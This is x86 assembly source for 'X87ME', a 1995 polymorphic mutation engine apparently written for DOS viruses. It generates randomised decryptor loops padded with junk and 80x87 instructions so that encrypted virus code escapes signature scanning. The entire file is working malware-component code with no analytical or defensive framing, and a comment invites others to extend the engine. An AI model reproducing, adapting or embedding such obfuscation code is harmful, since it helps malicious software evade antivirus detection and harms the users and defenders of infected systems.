
; This is [X87ME]
; Written by Zhuge Jin in Taipei, Taiwan.
; (C) Copyright TPVO . , 1995.

enc_cod db 10101000b,02h, 10000000b,2ah, 10110000b,32h, 10110000b,32h
;          sub.......add  add.......sub  xor.......xor  xor.......xor

reg_cod db 011b,111b,   101b,110b,   110b,100b,   111b,101b
;          bx,[bx+disp] bp,[bp+disp] si,[si+disp] di,[di+disp]

reg db ?,?

a0 dw ?  ; address of decode start
a1 dw ?  ; address of "mov reg,xxxxh"
a2 dw ?  ; address of "xor byte ptr [reg+xxxxh],xxh"
a3 dw ?  ; address of "jz xxxxh"
a4 dw ?  ; address of "jmp xxxxh"

X87ME:
        cld

        push ds
        push dx

        push cs    ; set ds:=cs
        pop ds     ;

        and bl,01h      ; set bl:=0b or 1b

        xor di,di       ; set di:=0000h

        call make_tsh_cod

        mov si,OFFSET reg_cod   ; set the register type
        call rnd_si             ;
        lodsw                   ;
        mov word ptr ds:reg,ax  ;

        or al,0b8h              ; make "mov reg,xxxxh"
        stosb                   ;
        mov ds:a1,di            ;
        stosw                   ;

        call make_tsh_cod
        call make_tsh_cod

        mov ds:a0,di            ; save address of decode start

        call make_tsh_cod

        test bl,01h             ; if bl:=1b .exe then make "cs:"
        jz un_cs                ;    bl:=0b .com then skip
        mov al,2eh
        stosb
un_cs:

        in al,40h               ; make add byte ptr [reg+disp],xxh
        and al,02h              ;      sub byte ptr [reg+disp],xxh
        add al,80h              ;      xor byte ptr [reg+disp],xxh
        stosb                   ;
        mov si,OFFSET enc_cod   ;
        call rnd_si             ;
        lodsw                   ;
        mov ds:enc_buf,ah       ;
        or al,ds:[reg+01h]      ;
        stosb                   ;
        mov ds:a2,di            ;
        in ax,40h               ; disp
        stosw                   ;
        in al,40h               ; encrypt key
        stosb                   ;

        call make_tsh_cod

        mov al,40h              ; make "inc reg"
        or al,ds:reg            ;
        stosb                   ;

        call make_tsh_cod

        mov ax,0f881h           ; make "cmp reg,xxxxh"
        or ah,ds:reg            ;
        stosw                   ;
        mov ds:a3,di            ;
        stosw                   ;

        or bl,10000000b
        call make_tsh_cod
        and bl,00000001b

        mov al,74h              ; make "jz xxxxh"
        stosb                   ;
        mov ds:a4,di            ;
        stosb                   ;

        call make_tsh_cod

        mov al,0e9h             ; make "jmp xxxxh"
        stosb                   ;
        mov ax,ds:a0            ;
        sub ax,di               ;
        dec ax                  ;
        dec ax                  ;
        stosw                   ;

        in ax,40h
        and ax,0fh
        add di,ax

        mov si,ds:a4
        mov ax,di
        sub ax,si
        dec ax
        mov es:[si],al

        mov ax,di
        add ax,bp
        mov si,ds:a2
        sub ax,es:[si]
        mov dl,es:[si+02h]
        mov si,ds:a1
        mov es:[si],ax
        mov ds:a1,ax

        pop si
        pop ds

        push cx

enc_prg:
        lodsb

enc_buf db 90,0c2h

        stosb
        loop enc_prg

        pop cx

        mov si,ds:a3
        mov ax,ds:a1
        add ax,cx
        mov es:[si],ax

x87me_ext:
        mov cx,di  ; set return para.
        xor dx,dx  ;
        push es    ;
        pop ds     ;
        ret

rnd_si:
        in ax,40h
        add al,es:[di-02h]
        neg ax
        and ax,0003h
        test bl,10000000b
        jz rs_a
        and al,01h
rs_a:
        add ax,ax
        add si,ax
        ret

mtc_tab dw OFFSET mtc1,OFFSET mtc2,OFFSET mtc3,OFFSET mtc4

make_tsh_cod:
        push cx
        in ax,40h
        and ax,0007h
        add ax,0003h
        mov cx,ax
mtc_l:
        mov si,OFFSET mtc_tab
        call rnd_si
        in ax,40h
        add al,es:[di-02h]
        call ds:[si]
        loop mtc_l
        pop cx
        ret

mtc1:
        mov al,0d8h             ; make 80x87 code !
        stosb                   ; You can add items in your engine!
mtc1_a1:
        in ax,40h
        mov al,ah
        and ah,00111000b
        cmp ah,00001000b
        jz mtc1_a1
        cmp ah,00110000b
        jae mtc1_a1
        mov ah,al
        and ah,11000111b
        cmp ah,00000110b
        jnz mtc1_a2
        stosb
        in ax,40h
        stosw
        ret
mtc1_a2:
        or al,11000000b
        stosb
        ret

mtc2:
        and al,01h
        mov dl,al
        shl dl,03h
        call rnd_reg
        and al,00000111b
        or al,0b0h
        or al,dl
        stosb
        cmp al,0b8h
        in ax,40h
        jb mtc2_a
        stosb
mtc2_a:
        stosb
        ret

mtc3:
        cmp al,0a0h
        jae mtc3_a3
        cmp al,40h
        jae mtc3_a2
mtc3_a1:
        and al,11111101b
        stosb
        mov ah,al
        and ah,00000100b
        jnz mtc3_a1b
        call rnd_reg
        stosb
        ret
mtc3_a1b:
        and al,01h
        cbw
        add di,ax
        inc di
        ret

mtc3_a2:
        mov al,01h
        call rnd_reg
        and al,0fh
        or al,40h
        stosb
        ret

cod db 91h,91h,98h,0d6h,0ech,0f8h,0fah
    db 27h,2fh,37h,3fh,9bh,9fh,0ceh,0cch,0f5h

mtc3_a3:
        and ax,000fh
        mov si,OFFSET cod
        add si,ax
        mov ah,ds:[si]
        cmp al,07h
        jae mtc3_a3b
        in al,40h
        and al,01h
        add ah,al
mtc3_a3b:
        mov al,ah
        stosb
        ret

mtc4:
        and al,02h
        or al,80h
        stosb
        call rnd_reg
        stosb
        in ax,40h
        stosw
        cmp byte ptr es:[di-04h],81h
        jz mtc4_a
        dec di
mtc4_a:
        ret

rnd_reg:
        mov bh,al
rr_a1:
        test bh,01h
        in al,40h
        mov ah,al
        jnz rr_a2
        and ah,00000011b
rr_a2:
        and ah,00000111b
        cmp ah,00000100b
        jz rr_a1
        cmp ah,ds:reg
        jz rr_a1
        or al,11000000b
        ret

X87ME_E:

